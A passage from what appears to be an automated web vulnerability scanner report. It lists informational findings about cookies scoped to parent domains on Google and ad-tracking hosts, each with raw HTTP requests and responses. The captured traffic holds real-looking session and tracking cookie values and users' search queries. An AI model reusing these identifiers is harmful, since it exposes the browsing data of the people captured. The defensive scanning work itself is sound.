Cookie: uuid2=2724386019227846218; icu=ChEI9nIQChgCIAIoAjC12KnuBBC12KnuBBgB; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Uxbd$ekQ..D!3bbvAPDd9f*e9c*LWg-SshA_B=s>@[)<BwI=Ps69UW>5QwNErBmt@g/BWJw)lx6z`x1?8`7Y]`Zmrs`WIFx0[L9DZ9L(U21EB2vXE[1%'3B(2j=Vz[zi1oQc4/COHVg'c$S:@7)(%t*$%/jvG-wwkk6Xc?E; sess=1

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 21:34:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 13-Aug-2011 21:34:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 13-Aug-2011 21:34:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eB!z6Uxbd$ekQ..D!3bbvAPDd9f*e9c*LWg-SshA`8$?a)y4E[awEZ=NRYH]uD*p*C0hV*uPX.hu:m6o?K5dWXQaKLvNc6uvJdkNRXx+G.Jdz8+ER>jd8trh0`4?o7aUl=7Z8ICIG-f)t.Jw?R[d%g5%'ml+e6b+@>>1HNgmU?N$>FG=uNIH(Eh#F0AnT^%9LRKtHe[qOwdIiju; path=/; expires=Sat, 13-Aug-2011 21:34:00 GMT; domain=.adnxs.com; HttpOnly
Location: http://cms.quantserve.com/dpixel?source=appnexus&eid=5&id=2724386019227846218
Date: Sun, 15 May 2011 21:34:00 GMT
Content-Length: 0

15.37. http://id.google.com/verify/EAAAAI5KErmDGgY20W4qgKYVOXI.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAI5KErmDGgY20W4qgKYVOXI.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=47=Lhm6ttn7an2-iBnzwND2ChEHpa2gcQrA0oxhn4qPKMBja0y3M9EooPWTFGVZE1WGhC0EeQbdhjodIci27iUTt4FJdl_w1CKKGajsRgpNHjVx0TFdmc2yQbpHgH6J9Zjt; expires=Tue, 15-Nov-2011 00:02:14 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAI5KErmDGgY20W4qgKYVOXI.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=localhost%3A19416%5D%2Fhoyt.net%2FSitefinity%2FStartup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=rmeNxjSpRiyowfuoPnPrfvCYPboGatm2egPZvsyJ6Q=PgdRYtYWovfexK6y; PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=X0FYGmfTMyj1F459tNArdzOEBt_RZ2SblIezIj5PNBGR3jQME9gQohiVBgO7qW2uuK6LmpVtHT1ukJzdFNGFyH2UtPYO_X4n6dxuajnk48nYL-oftk6H-Nz9AjrWiY35

Response

HTTP/1.1 200 OK
Set-Cookie: NID=47=Lhm6ttn7an2-iBnzwND2ChEHpa2gcQrA0oxhn4qPKMBja0y3M9EooPWTFGVZE1WGhC0EeQbdhjodIci27iUTt4FJdl_w1CKKGajsRgpNHjVx0TFdmc2yQbpHgH6J9Zjt; expires=Tue, 15-Nov-2011 00:02:14 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 16 May 2011 00:02:14 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

15.38. http://id.google.com/verify/EAAAAI5WmUe7AMUDtVWgnHpi9vs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAI5WmUe7AMUDtVWgnHpi9vs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=47=rmeNxjSpRiyowfuoPnPrfvCYPboGatm2egPZvsyJ6Q=PgdRYtYWovfexK6y; expires=Mon, 14-Nov-2011 20:26:17 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAI5WmUe7AMUDtVWgnHpi9vs.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=play+station+network
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=m1F73lFDPpRGZqSrEOdNE2JdpeyQ7mR8QK2EVMuvag=6WgzUMQsmx7KxYv_; PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=X0FYGmfTMyj1F459tNArdzOEBt_RZ2SblIezIj5PNBGR3jQME9gQohiVBgO7qW2uuK6LmpVtHT1ukJzdFNGFyH2UtPYO_X4n6dxuajnk48nYL-oftk6H-Nz9AjrWiY35

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=47=rmeNxjSpRiyowfuoPnPrfvCYPboGatm2egPZvsyJ6Q=PgdRYtYWovfexK6y; expires=Mon, 14-Nov-2011 20:26:17 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 15 May 2011 20:26:17 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

15.39. http://id.google.com/verify/EAAAAK1jLqbLr1uikXFW8U9zAtc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAK1jLqbLr1uikXFW8U9zAtc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=47=IcQivqrsQQyyODzSZ3jSjP-k_5NKyAJcx7JYMTwH=eIcQYTf9W4Lifywd; expires=Mon, 14-Nov-2011 23:49:42 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAK1jLqbLr1uikXFW8U9zAtc.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=nuget&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: SNID=46=7OlI8L_PxEjKQZj0CgJBrMWXHydPiXauVoDxBWAH=Mu5-FieSVIAbgOSz; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=KItN1BTtwQNNlX1ALe1vDC7hoepoKX2UQICiquxtJyGvPpXkRhOP0VSYRncKH-Ip7WUjGpM92yvv3kjAfNGRUaBZTHmZpQy4UvWTLU1BWRwGdARXc--dGj_5qPLGEDEK

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=47=IcQivqrsQQyyODzSZ3jSjP-k_5NKyAJcx7JYMTwH=eIcQYTf9W4Lifywd; expires=Mon, 14-Nov-2011 23:49:42 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 15 May 2011 23:49:42 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

15.40. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=9622=734271; domain=.interclick.com; expires=Sat, 15-May-2021 20:32:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=3d84d9a0-01cd-403c-ac63-e21bcadc6176 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1770367;type=pshol390;cat=psn_l603;ord=6792094237171.113?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271; domain=.interclick.com; expires=Sat, 15-May-2021 20:32:16 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 15 May 2011 20:32:16 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

15.41. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2ll77mm01171voofy6a0tk1w02dey0043r030l03504; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
orblb=2ll8nk2011y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
rdrlst=4030d6hll8nk2000000033r0301hvll8nk2000000033r0301g3ll8nk2000000033r03; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
sglst=2010s1jzll8nk200xhi0033r030l03503; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5392 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=012020h1ll77mmxzt10; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; clid=2ll77mm01171voofy6a0tk1w02deg0033r020l02503; orblb=2ll8nk2011y510u0100000; rdrlst=4030d6hll8nk2000000023r0201hvll8nk2000000023r0201g3ll8nk2000000023r02; sglst=2010s1jzll8nk200xh00023r020l02502

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02dey0043r030l03504; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
Set-Cookie: orblb=2ll8nk2011y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
Set-Cookie: rdrlst=4030d6hll8nk2000000033r0301hvll8nk2000000033r0301g3ll8nk2000000033r03; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
Set-Cookie: sglst=2010s1jzll8nk200xhi0033r030l03503; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
Set-Cookie: vstcnt=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:20:07 GMT

GIF89a.............!.......,...........D..;

15.42. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

KRTBCOOKIE_58=1344-AG-00000001389358554; domain=pubmatic.com; expires=Sun, 14-Aug-2011 01:19:52 GMT; path=/
PUBRETARGET=445_1313284792; domain=pubmatic.com; expires=Sun, 14-Aug-2011 01:19:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTQ0NSZ0bD0xMjk2MDA=&piggybackCookie=AG-00000001389358554 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PUBMDCID=2; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; pubfreq_27159=; pubtime_27159=TMC; pubfreq_27159_22228_261216082=165-1; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:52 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_58=1344-AG-00000001389358554; domain=pubmatic.com; expires=Sun, 14-Aug-2011 01:19:52 GMT; path=/
Set-Cookie: PUBRETARGET=445_1313284792; domain=pubmatic.com; expires=Sun, 14-Aug-2011 01:19:52 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

15.43. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLvv9S8JaSpnph4dB7K/U2jMXE9l9UPv4cAxSFUju2SKUz95WBnMIjc0Jq4KGB9vOb2p7tsHUn0i4kv3IuuN09LTaoxzFIqHdDdOfDkiI3Q5SzKPuSl0/IBAUNz2Q+yb+sUOsJ6tk9CZlnWX9ofHJRQpixo+R7Jj8KTzm2j7rf1VPj+gUeVQubgOH4XSap+Qg7KPXbqwUJo/+ER9xQrBcVgFRdC3IDw40FQMJvqXOdGrUvDs2Iipiq7YjYZ56PtJJuvrAisvufRRN3jjCjUgAN6XG3lhXhgLfbMM4U4EYo8/xtXBTuqdNoJOieZ4DCsKHO68uU/euXERtDCaHNg4xypbadOuFs2iQ7aZn0Zw/YiglpUWbhpM9Se8rt2PFznhtpHIwb+pCAyvv8bBI7//FYyrld4XnLPA5Dpv+FBsnPMvRe3VBHeTdEOP/9bPUYskLTQMzosNs1A7v+FuDPjgcRzMjTu5ZC9P39i2E6Vh8eZTU4GFpOvGxMh+BfAkTrdQj+LYpPes8NM15/9dkUHovMxq9zuthZhsKtzNKhVXxJOJ/U1ZJ2FABNgGZyv6PuOkAN8PMLA+2RNiu0BuRlzu2pc20wnXGbPZ1P215dIyLzffMP8tUAq2HKFNoSxxR0BhUurZQhJdcYGcDMXbHRwrBeLs/wSev3A4Rr7LW2ynoMvfRe5xd9OMb1cdENK/H+zq6gnaAW26KbYR2sOUuqn+b4H29p3USZXhoI5xVPIG9K982gWOhYW/Os9PCMvjPYfKkqEw4pXSuMmXkMQ3RXp9fcPdDizaKVnLwM6v2chYpYu0gJG66oxzEdPSAEZANDz7bYa88srJlE8fEYCV9vJQE5dv4cgl8M9QoOqlwiV1WMetlzANuR8TZRnUC1d3oIkujdICfZleM0O0FSiThWA9X5ObvBCKElJImKHmbBpjZdsM1Ufn0stWyVeWwdqPG4bj4iil0FNQXNlyTzS4eEefCQ2uWzlsElVopKY1U3v1N1zYT2bhIP+fd3zR750=; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:25:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=J06575 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxaPzsVdi8Ni1rYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3w4B4lBCjXwQIbR0jlRnTHgpk5f1sQGfmFmyVEtx+gxjLU3wnYgttSfhxMbzfydi3AAGoKvCmxF7TxORX1mqADXOanLZaz6sJGSEz90RB0KeOifwnURRHhCsVk3w6bNETq9nc+k2ll9KMbb8sWgiVgH2Zd335WJFX18Hy2/BgZNsf9NM8irA1uZi6UJW+DKzXg+99MdH2//xFgX+ZPOQDsoy9Be8AFAdjuskLYUDxsUlNhyqQaWwGvJyuAuf0Ss2l0uH6jvt4FcFbTkZBk9q7caxdxw2TJZQfbfDKhb2bpjeGdZoqJ44fCKH3DoxpfXBIW3ohUSVLFElW2dztek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0tnXPvFFCQ2Evk4Yarbh4YiTvgdw/8E5sj9TdpiToNMPKRMu250cwirAHBwhZoo9S04egkJIm5Tk0Su5s9KFZoDc41rkgS7pZnikG/LfPzPlgEjldlohervfYVZ/LaMjmJuZfR6SZUqtPVd8O7nMqgFt6bf4Md0jAFU3IbNqPuCHHS/cEp3nCnspLAR4e1R+gGitqEYVA+JOiq4sp+fRtOiU1jtoQ4FRVaJP/03I9PtH0VkJpFhL7CuayYoDhdKu0ByWZy+KTL1v/OQpmY1nftZfGOHQjKSF2P1zTGfEpRqL2kw=="; udm_0=MLv381MJZihn557Fg9CgawbiVA1lL/FuRN2YvTxnLmFE6w8NbGJPaUPFCwsFgR3sv7657LwRKNAmXEh2aSb0Zv5bckFYISl1fyfVVAwqoQYt9FhqVjQGjuSl8z6Qv6cnv53ckanPEOOXZwkn9RV/ihHtOHpoTy2LVEsR1+0TtypJG/O4klSyrU9gYKd0fFdaupz4d8b9Rxi9djrm40BWjcIFDUCw9gcW5BQs/64wXLGemKagzfYsk+Be/OQ5xaBZaSj3b4jGGpgM2F1qkr0iYXTLNphhYma6fAml/0UvewxClD7zldQ+WamH9ng0nRYrjN3PcYJlfkkul9U4BAGhifhxBj1sv6C4RRL6UBTL2KUx9T8V8YFXz7YPDtGbM6sgCs3RB0SA0ycbHqx2WVsbyLukuWo7YvdldaMxV/fshebvGXE1IKazvSkswdMfyeVYT15UrtqFCLGABTryXWv1F+XgNgqFTFNm1drz5UX6WcHHivrY2QGkCz6fiXlqtAAj2PQTrzRvQYY3+HAqdC/dwE6FNus7vDx+1K0MO1Vn1WWhUby27gM/6Lvnw+nLSKBM9mlSNVmKh4Cl1j5OW52264m48pkDKKkPrWJxRKzTa8xhzae+N2XhA3eQHMYIuSfo6DKhiNWS8b6W6n7VDBCgOJVgcqeSwyQO9riL8Y+OBI7v42chasKmrve6popZvLjbjISWE/8fGIxOEnCWfaty7H8syDJC8iLF+r2Pk9zRn7S7inz1SkdFk46H89ZroiU3qJ8F4oMHF00Dqpt0O0HkGEPMNMCBv6ze8LvUmIjdewmx8LI2ISHGcVDcWQcRml0Ptz3tmYMOzEcNnD/OWoGqhyV5W6e32jcAAG35EbiTDNfnpMuUqc30dB9i8xri9Uidkc3TiOUOJ3qWTz5ZJEKhbm4X9u7mxzmpya1rCbaVfzsAA6Q=; rsi_segs_1000000=pUPNfcPG7hMUFmJSL/a6Tc2cVgtigl9iBC1EXVoovPAwnmKsOWQJ/ULPGqLC16G0T17iRicC5KARkwTsTN8ioePPguoJ741/DK1Cmzf3MeNCyP1GEAb//VXLu/54y0XW2Qc7M45GdUJiNdjHq/ZtHS6Ghn8KrCU4potT0MwJAi0TACPm038iu2F90zRFvW2tyQA=; rtc_ac8M=MLuBq44HAVpDE1RBdcKRB7ZxEIAJXzMpNIiX6/DkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jVUOEA+YtTPI8JufG/Cre49XXYBRXzYUblcveQ2ugG0KGJ2zDaCaA59xBUJAUsWH2wHE3djRDcpNER26fldZTABDtd4uTBdzX9g62NQniwGxHVABktEbzdrInhjUjr8DeZHE2mPTEUo; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvv9S8JaSpnph4dB7K/U2jMXE9l9UPv4cAxSFUju2SKUz95WBnMIjc0Jq4KGB9vOb2p7tsHUn0i4kv3IuuN09LTaoxzFIqHdDdOfDkiI3Q5SzKPuSl0/IBAUNz2Q+yb+sUOsJ6tk9CZlnWX9ofHJRQpixo+R7Jj8KTzm2j7rf1VPj+gUeVQubgOH4XSap+Qg7KPXbqwUJo/+ER9xQrBcVgFRdC3IDw40FQMJvqXOdGrUvDs2Iipiq7YjYZ56PtJJuvrAisvufRRN3jjCjUgAN6XG3lhXhgLfbMM4U4EYo8/xtXBTuqdNoJOieZ4DCsKHO68uU/euXERtDCaHNg4xypbadOuFs2iQ7aZn0Zw/YiglpUWbhpM9Se8rt2PFznhtpHIwb+pCAyvv8bBI7//FYyrld4XnLPA5Dpv+FBsnPMvRe3VBHeTdEOP/9bPUYskLTQMzosNs1A7v+FuDPjgcRzMjTu5ZC9P39i2E6Vh8eZTU4GFpOvGxMh+BfAkTrdQj+LYpPes8NM15/9dkUHovMxq9zuthZhsKtzNKhVXxJOJ/U1ZJ2FABNgGZyv6PuOkAN8PMLA+2RNiu0BuRlzu2pc20wnXGbPZ1P215dIyLzffMP8tUAq2HKFNoSxxR0BhUurZQhJdcYGcDMXbHRwrBeLs/wSev3A4Rr7LW2ynoMvfRe5xd9OMb1cdENK/H+zq6gnaAW26KbYR2sOUuqn+b4H29p3USZXhoI5xVPIG9K982gWOhYW/Os9PCMvjPYfKkqEw4pXSuMmXkMQ3RXp9fcPdDizaKVnLwM6v2chYpYu0gJG66oxzEdPSAEZANDz7bYa88srJlE8fEYCV9vJQE5dv4cgl8M9QoOqlwiV1WMetlzANuR8TZRnUC1d3oIkujdICfZleM0O0FSiThWA9X5ObvBCKElJImKHmbBpjZdsM1Ufn0stWyVeWwdqPG4bj4iil0FNQXNlyTzS4eEefCQ2uWzlsElVopKY1U3v1N1zYT2bhIP+fd3zR750=; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:25:49 GMT; Path=/
Last-Modified: Mon, 16 May 2011 01:25:49 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 16 May 2011 02:25:49 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:48 GMT
Content-Length: 5912

//Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC)
var rsi_now= new Date();
var rsi_csid= 'J06575';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

15.44. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

C2=jCI0NFJwHsb0FpfqHjQCiZ4Si+CCeziRblK8IYsYGAH; domain=advertising.com; expires=Wed, 15-May-2013 01:40:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3761435560882.0913?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=JvH0NFJwHsb0FtfqHjQCiZITi+CCeziRcB; F1=Bk8eQ3EBAAAABAAAAEBACCA; BASE=x7Q9Mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SsSr6+LbSM!; ROLL=U6APIjeKkzEWubpE6Al2BE2iZmDmLrCs2nFCCpOodIr/p+YO855CAlIH6FkTqWZ8dl6Dt86qJxfhU88uP3KlkcN!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:40:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=jCI0NFJwHsb0FpfqHjQCiZ4Si+CCeziRblK8IYsYGAH; domain=advertising.com; expires=Wed, 15-May-2013 01:40:51 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 16 May 2011 02:40:51 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

15.45. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

